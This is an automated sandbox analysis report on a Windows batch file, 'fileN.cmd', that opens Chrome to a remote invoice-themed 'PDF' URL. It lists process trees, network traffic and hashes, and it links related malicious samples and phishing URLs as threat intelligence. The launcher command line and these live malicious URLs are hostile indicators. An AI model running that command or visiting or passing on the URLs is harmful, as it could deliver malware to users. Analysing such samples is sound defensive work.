Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fileN.cmd

Overview

General Information

Sample name:fileN.cmd
Analysis ID:1446783
MD5:b0440336a17e2a86c8fdaab419c3a3f7
SHA1:f831b05ff3fc56c2e023e4121e07b895fe1d9153
SHA256:7d5848842e934d5a57fb8766962a556e01c3715481d63d2a10dbca4bac897ddf
Tags:cmd
Infos:

Detection

Score:2
Range:0 - 100
Whitelisted:false
Confidence:60%

Signatures

Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)

Classification

  • System is w10x64
  • cmd.exe (PID: 5424 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\fileN.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chrome.exe (PID: 4136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 4092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2016,i,2758172289711227357,3117054335507487613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: https://s2r.tn/cgi/INVOICERVSHA.pdfHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 70.38.21.234 70.38.21.234
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: global trafficHTTP traffic detected: GET /cgi/INVOICERVSHA.pdf HTTP/1.1Host: s2r.tnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: s2r.tnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://s2r.tn/cgi/INVOICERVSHA.pdfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cgi/INVOICERVSHA.pdf HTTP/1.1Host: s2r.tnConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=xDvV1b4DS8yY7Hh&MD=9xpw3R+4 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=xDvV1b4DS8yY7Hh&MD=9xpw3R+4 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficDNS traffic detected: DNS query: s2r.tn
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 19:06:50 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 19:06:51 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 19:06:51 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: fileN.cmdString found in binary or memory: https://s2r.tn/cgi/INVOICERVSHA.pdf
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: classification engineClassification label: clean2.winCMD@18/4@4/4
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3840:120:WilError_03
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\fileN.cmd" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2016,i,2758172289711227357,3117054335507487613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdfJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2016,i,2758172289711227357,3117054335507487613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdfJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
11
Process Injection
11
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
DLL Side-Loading
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 1446783 Sample: fileN.cmd Startdate: 23/05/2024 Architecture: WINDOWS Score: 2 6 cmd.exe 13 2->6         started        process3 8 chrome.exe 6 6->8         started        11 conhost.exe 6->11         started        dnsIp4 16 192.168.2.6, 443, 49698, 49704 unknown unknown 8->16 18 239.255.255.250 unknown Reserved 8->18 13 chrome.exe 8->13         started        process5 dnsIp6 20 s2r.tn 70.38.21.234, 443, 49704, 49705 IWEB-ASCA Canada 13->20 22 www.google.com 216.58.212.132, 443, 49710, 49722 GOOGLEUS United States 13->22

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
fileN.cmd0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://s2r.tn/favicon.ico0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
s2r.tn
70.38.21.234
truefalse
    unknown
    www.google.com
    216.58.212.132
    truefalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://s2r.tn/cgi/INVOICERVSHA.pdffalse
        unknown
        https://s2r.tn/favicon.icofalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        70.38.21.234
        s2r.tnCanada
        32613IWEB-ASCAfalse
        239.255.255.250
        unknownReserved
        unknownunknownfalse
        216.58.212.132
        www.google.comUnited States
        15169GOOGLEUSfalse
        IP
        192.168.2.6
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1446783
        Start date and time:2024-05-23 21:05:58 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 3m 58s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:9
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:fileN.cmd
        Detection:CLEAN
        Classification:clean2.winCMD@18/4@4/4
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .cmd
        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 142.250.185.227, 142.250.186.46, 74.125.133.84, 34.104.35.123, 199.232.214.172, 192.229.221.95, 142.250.181.227, 172.217.18.14
        • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • VT rate limit hit for: fileN.cmd
        No simulations
        InputOutput
        URL: https://s2r.tn/cgi/INVOICERVSHA.pdf Model: Perplexity: mixtral-8x7b-instruct
        {
        "loginform": false,
        "reasons": [
        "The text 'Not Found The requested URL was not found on this server. Additionally: a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.' does not indicate the presence of a login form.",
        "It is a 404 error message, which means the page was not found and there is no login form on this page."
        ]
        }
        Not Found The requested URL was not found on this server. Additionally: a 404 Not Found error was encountered while trying to use an ErrorDument to handle the request. 
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        70.38.21.234filePY.cmdGet hashmaliciousUnknownBrowse
          file py p.batGet hashmaliciousUnknownBrowse
            file py portable.batGet hashmaliciousUnknownBrowse
              fileEEE.batGet hashmaliciousUnknownBrowse
                https://greenwoodpark.com.au/hvilkes-receipt.zipGet hashmaliciousUnknownBrowse
                  https://opodo.onelink.me/RnQA?pid=CRM&af_adset=email&af_ad=crm_nl_PDA_SneakPeek_NP_X_290124__&is_retargeting=true&af_dp=op-app%3A%2F%2Flaunch%2F%3futm_content%3dUL_hero%26utm_source%3dsf%26utm_medium%3dcrm%26utm_campaign%3dnl%26utm_term%3dXX-XX-CRM-E-NL-PDA-FL-X-NP_PrimeDay8_NonPrime_SneakPeekAPP_290124_Render_435150%26mktportal%3dNL&af_web_dp=https://tunisianrentcar.tn/jo0eue/9761/new/new/dvader@hinckleyallen.com##Get hashmaliciousUnknownBrowse
                    upload.vbsGet hashmaliciousVenomRATBrowse
                      update.vbsGet hashmaliciousXWormBrowse
                        windows.vbsGet hashmaliciousXWormBrowse
                          file.batGet hashmaliciousUnknownBrowse
                            239.255.255.250new.cmdGet hashmaliciousGuLoaderBrowse
                              filePY.cmdGet hashmaliciousUnknownBrowse
                                http://hxjmm.check-tl-ver-154-2.comGet hashmaliciousUnknownBrowse
                                  https://gheenirrigation.zendesk.com/api/v2/channels/voice/calls/CA22db3177fb7a310b9b6e136c494a58df/twilio/voicemail/recordingGet hashmaliciousUnknownBrowse
                                    https://t.co/PmbTTSQ6z4Get hashmaliciousUnknownBrowse
                                      b23c466-Payment Reciept May 22 2024.htmlGet hashmaliciousUnknownBrowse
                                        https://freexxxth.linkGet hashmaliciousUnknownBrowse
                                          https://freexxxth.linkGet hashmaliciousUnknownBrowse
                                            https://www.flipsnack.com/C65D7DCC5A8/sw-bruce-limited/full-view.htmlGet hashmaliciousUnknownBrowse
                                              https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1Get hashmaliciousUnknownBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                s2r.tnfilePY.cmdGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                file py p.batGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                file py portable.batGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                fileEEE.batGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                https://greenwoodpark.com.au/hvilkes-receipt.zipGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                upload.vbsGet hashmaliciousVenomRATBrowse
                                                • 70.38.21.234
                                                update.vbsGet hashmaliciousXWormBrowse
                                                • 70.38.21.234
                                                windows.vbsGet hashmaliciousXWormBrowse
                                                • 70.38.21.234
                                                file.batGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                file.vbsGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                IWEB-ASCAfilePY.cmdGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                file py p.batGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                file py portable.batGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                fileEEE.batGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                IUzBqUNYMK.elfGet hashmaliciousUnknownBrowse
                                                • 174.142.183.68
                                                https://greenwoodpark.com.au/hvilkes-receipt.zipGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                https://opodo.onelink.me/RnQA?pid=CRM&af_adset=email&af_ad=crm_nl_PDA_SneakPeek_NP_X_290124__&is_retargeting=true&af_dp=op-app%3A%2F%2Flaunch%2F%3futm_content%3dUL_hero%26utm_source%3dsf%26utm_medium%3dcrm%26utm_campaign%3dnl%26utm_term%3dXX-XX-CRM-E-NL-PDA-FL-X-NP_PrimeDay8_NonPrime_SneakPeekAPP_290124_Render_435150%26mktportal%3dNL&af_web_dp=https://tunisianrentcar.tn/jo0eue/9761/new/new/dvader@hinckleyallen.com##Get hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                WDzkAh06Pf.elfGet hashmaliciousMiraiBrowse
                                                • 70.38.94.230
                                                DHL-2854-56463.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 107.161.75.133
                                                Statement of account.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 174.142.95.75
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                28a2c9bd18a11de089ef85a160da29e4new.cmdGet hashmaliciousGuLoaderBrowse
                                                • 184.28.90.27
                                                • 20.114.59.183
                                                filePY.cmdGet hashmaliciousUnknownBrowse
                                                • 184.28.90.27
                                                • 20.114.59.183
                                                https://t.co/PmbTTSQ6z4Get hashmaliciousUnknownBrowse
                                                • 184.28.90.27
                                                • 20.114.59.183
                                                b23c466-Payment Reciept May 22 2024.htmlGet hashmaliciousUnknownBrowse
                                                • 184.28.90.27
                                                • 20.114.59.183
                                                https://www.flipsnack.com/C65D7DCC5A8/sw-bruce-limited/full-view.htmlGet hashmaliciousUnknownBrowse
                                                • 184.28.90.27
                                                • 20.114.59.183
                                                https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1Get hashmaliciousUnknownBrowse
                                                • 184.28.90.27
                                                • 20.114.59.183
                                                https://www.google.com/url?q=https://tame-coherent-emmental.glitch.me/%23aG95ZUB1bW4uZWR1&source=gmail-imap&ust=1717088881000000&usg=AOvVaw14q68JL0hvqaGr_XiCkvK4Get hashmaliciousHTMLPhisherBrowse
                                                • 184.28.90.27
                                                • 20.114.59.183
                                                http://all4promos.comGet hashmaliciousUnknownBrowse
                                                • 184.28.90.27
                                                • 20.114.59.183
                                                http://qcqsn.drivers-hp-dell-asus.ru/4Clxwy9769ZIGi545pwqtzclyna14499EAEPPODKZHNKREZ30JPNY13019f17Get hashmaliciousPhisherBrowse
                                                • 184.28.90.27
                                                • 20.114.59.183
                                                http://kerapoxy.ccGet hashmaliciousUnknownBrowse
                                                • 184.28.90.27
                                                • 20.114.59.183
                                                No context
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text
                                                Category:downloaded
                                                Size (bytes):315
                                                Entropy (8bit):5.0572271090563765
                                                Encrypted:false
                                                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
